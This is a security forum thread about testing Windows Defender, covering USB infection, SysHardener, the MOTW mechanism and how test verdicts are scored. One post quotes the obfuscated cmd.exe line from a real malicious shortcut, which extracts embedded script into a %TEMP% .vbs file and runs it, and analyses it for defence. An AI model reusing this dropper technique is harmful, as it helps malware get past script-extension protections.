Windows Defender - June 2019 Report

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Evjl's Rain,
I am curious why in some countries there is a problem with infection via USB drives (which is a well known fact). This vector of infection has some downsides:
  1. The malware is usually checked twice (or more) by AVs - someone has to download it from the Internet and share with others via USB drive.
  2. The moment of downloading from the USB drive usually happens a few days later.
It seems that it is not easy to be infected this way, except when sharing many executables downloaded via torrents from shady websites (usually pirated games, software cracks, etc.).
That was the case in my country some years ago, but it is not a problem now.
How popular is Windows 10 in your country?
 

Evjl's Rain

Level 47
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Apr 18, 2016
3,684
Evjl's Rain,
I am curious why in some countries there is a problem with infection via USB drives (which is a well known fact). This vector of infection has some downsides:
  1. The malware is usually checked twice (or more) by AVs - someone has to download it from the Internet and share with others via USB drive.
  2. The moment of downloading from the USB drive usually happens a few days later.
It seems that it is not easy to be infected this way, except when sharing many executables downloaded via torrents from shady websites (usually pirated games, software cracks, etc.).
That was the case in my country some years ago, but it is not a problem now.
How popular is Windows 10 in your country?
in Asian countries, people usually have crap hardwares => so many people are still using Windows 7, even W7 32bit (I am). The price is not cheap for many people and the income is not high too
I have 4 machines, 2 of them have 2GB RAM, 1 has 4GB and my personal laptop has 8GB
the lower end ones are even struggling to run W7 32bit but at least they are still usable. I don't even dare to think about install higher versions
Many people refuse to use any security product because they assume they are knowledgeable
Many novice users using W7 don't even know how to install an AV => sources of viruses
some PCs in my hospital have expired license of Kaspersky 2015!!! and some don't even have an AV

People in my country like cracks because they don't like paying for softwares, another source of viruses
Mostly cracked products are internet download manager, games, game hacktools, norton, kaspersky, eset, windows and MS office

EDIT: I have seen many people attempted to install W10 on their low-end machines, then, they had windows updates issues or they couldn't tolerate the decrease in speed => they ask tech guys to install W7 back
W10 prevalence is increasing but much slower compared to other countries, I guess
 
Last edited:
F

ForgottenSeer 72227

@Evjl's Rain

I saw that you tested WD maxed with Syshardener a few times. Even though you stopped testing it, from looking at the small sample size, it seems the combo proved to be quite effective. To me it's all about having proper layers. WD has improved a lot, but adding something like syshardener locks down the system even more and provides a very, very strong setup that is both free with minimal fuss/annoyances IMO.

Thanks for testing the combo for a little bit. (y)
 

Evjl's Rain

Level 47
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Apr 18, 2016
3,684
@Evjl's Rain

I saw that you tested WD maxed with Syshardener a few times. Even though you stopped testing it, from looking at the small sample size, it seems the combo proved to be quite effective. To me it's all about having proper layers. WD has improved a lot, but adding something like syshardener locks down the system even more and provides a very, very strong setup that is both free with minimal fuss/annoyances IMO.

Thanks for testing the combo for a little bit. (y)
I'm testing it but only with big pack. I don't test small pack with single malwares because most of them are detected by MS on VT or blocked by SH (they are scriptors) when I see the extensions
I have a big problem with my internet connection for a few days, youtube cannot even play at 144p sometimes, opening MT takes 30s or error_resolved
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
I noticed that the malware packs on Malware Hub do not include the malware attacks introduced by shortcuts. There are some less common possibilities, too (CHM scriptors, etc.). Malicious shortcuts are delivered in ZIP archives with embedded malicious scripts and can use PowerShell or other Interpreters (wmic.exe, etc.) to run these scripts by command line. It is pretty common in the wild and will bypass SysHardener script protection (by file extension).
In these cases, malware packs simply ignore shortcuts and include only the scripts. So the malware in the wild (not blocked by SysHardener) will be blocked by SysHardener on Malware Hub.(y)
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Some shortcuts are explicitly malicious because they use malicious content in the command line (like phishing URL). Such malicious shortcuts can be seen on web sites with malware samples.
But, many shortcuts which can start the infection chain are completely innocent. If one runs such a shortcut alone, then nothing happens. It can start the infection chain only when other malicious files are present. It is not important for testing AVs, because they do not differentiate if the scriptor is run directly by the user or indirectly by the shortcut (with command line including script Interpreter or LOLBin).
 
Last edited:

silversurfer

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,048
I noticed that the malware packs on Malware Hub do not include the malware attacks introduced by shortcuts. There are some less common possibilities, too (CHM scriptors, etc.). Malicious shortcuts are delivered in ZIP archives with embedded malicious scripts and can use PowerShell or other Interpreters (wmic.exe, etc.) to run these scripts by command line. It is pretty common in the wild and will bypass SysHardener script protection (by file extension).
In these cases, malware packs simply ignore shortcuts and include only the scripts. So the malware in the wild (not blocked by SysHardener) will be blocked by SysHardener on Malware Hub.(y)
Shortcuts as samples are rarely to find usually, some of them seems to be broken or doesn't work correctly inside VM.

Here is a fresh sample (inquiryAug7.doc.lnk)
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Shortcuts as samples are rarely to find usually, some of them seems to be broken or doesn't work correctly inside VM.

Here is a fresh sample (inquiryAug7.doc.lnk)
It is a good example. The below (obfuscated) command line executed by cmd.exe:
copy BETLu & (fi^ndst^r "VljmN.*" inquiryAug7.doc.lnk > "%TEMP%\LRIRQ.vbs" & "%TEMP%\LRIRQ.vbs") & hpMFr
will do nothing in Virtual Machine, except if the right file inquiryAug7.doc.lnk is already present in the right location. This command can create/execute LRIRQ.vbs script from the code embedded in the shortcut inquiryAug7.doc.lnk.
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Evjl's Rain ,
The screenshots from your test https://malwaretips.com/threads/malware-samples-17-9-08-2019.94252/post-828668 suggest, that after reboot the system is not infected. There is one leftover in the registry (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) which tries to run the payload (JAR file) on Windows start. That is why javav.exe is present in Process Explorer. This action fails because the payload was detected and already removed by WD.
The system is not clean, but there is no evidence of an active & malicious code running.(y)
Windows 10 x64-2019-08-10-03-15-45.png

I noticed the same behavior in some other tests about WD, where the final status was infected, but in fact, it was not clean (with similar leftovers in the Registry).

Edit.
Such a leftover in the registry is not dangerous at all and does not contain any malicious code.
If one has a file leftover (not active) on disk, then this would be more dangerous, because the user could accidentally run the malicious file - but as I can see in such cases, the system is qualified on MH as not infected (not clean).:unsure:
 
Last edited:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
For the sake of knowledge, I read in this thread you discussed a lot about Mark of the web. I already knew most of these things from past forum posts.
How did you learn about them? Is there any official microsoft documentation?
I first read everything I can found about the subject and then test it by myself. (y) :giggle:
I know much about MOTW because some of my applications rely on it (RunBySmartScreen RunAsSmartScreen, and ConfigureDefender).
 

TheMalwareMaster

Level 21
Verified
Honorary Member
Top Poster
Well-known
Jan 4, 2016
1,022
I first read everything I can found about the subject and then test it by myself. (y) :giggle:
I know much about MOTW because some of my applications rely on it (RunBySmartScreen RunAsSmartScreen, and ConfigureDefender).
So, no microsoft documentation? (as usual)
 
  • Like
Reactions: oldschool

silversurfer

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,048
Edit.
Such a leftover in the registry is not dangerous at all and does not contain any malicious code.
If one has a file leftover (not active) on disk, then this would be more dangerous, because the user could accidentally run the malicious file - but as I can see in such cases, the system is qualified on MH as not infected (not clean).:unsure:
Autoruns before reboot are always to be considered as infected, but after reboot in case of broken Autoruns, the system would be mostly Not Clean.

@Evjl's Rain isn't really wrong at all, he wrote about final-status: infected / not clean

 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Autoruns before reboot are always to be considered as infected, but after reboot in case of broken Autoruns, the system would be mostly Not Clean.

@Evjl's Rain isn't really wrong at all, he wrote about final-status: infected / not clean

@Evjl's Rain did the test very well:giggle:(y)
The final verdict from the test was:
Final status: Before Reboot: Infected | After reboot: Infected/not clean
My suggestion:
Final status: Before Reboot: Infected | After reboot: Protected/not clean

Edit.

The behavior of the system strongly suggests that the leftover in the Registry (detected by Zemana) points to the non-existent payload, but to be completely sure I would have to see the data of this Registry key.
 
Last edited:

silversurfer

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,048
@Evjl's Rain did the test very well:giggle:(y)
The final verdict from the test was:
Final status: Before Reboot: Infected | After reboot: Infected/not clean
My suggestion:
Final status: Before Reboot: Infected | After reboot: Protected/not clean

Edit.

The behavior of the system strongly suggests that the leftover in the Registry (detected by Zemana) points to the non-existent payload, but to be completely sure I would have to see the data of this Registry key.
Of course, You are right again, I agree at all (y)
We still discussing among all testers! finally, it's up to the testers in such cases like above...
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
The tests made by @Evjl's Rain are helpful for me to understand the peculiarities of WD. Testing WD is a challenge, because it can use AI, ML models, ASR rules, etc.. It also depends on the cloud and file MOTW. Furthermore, from MS documentation is often unclear which features can be activated in Windows Home. Testing WD is usually more time consuming and harder to interpret the results, so I am grateful for his excellent work.(y)
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top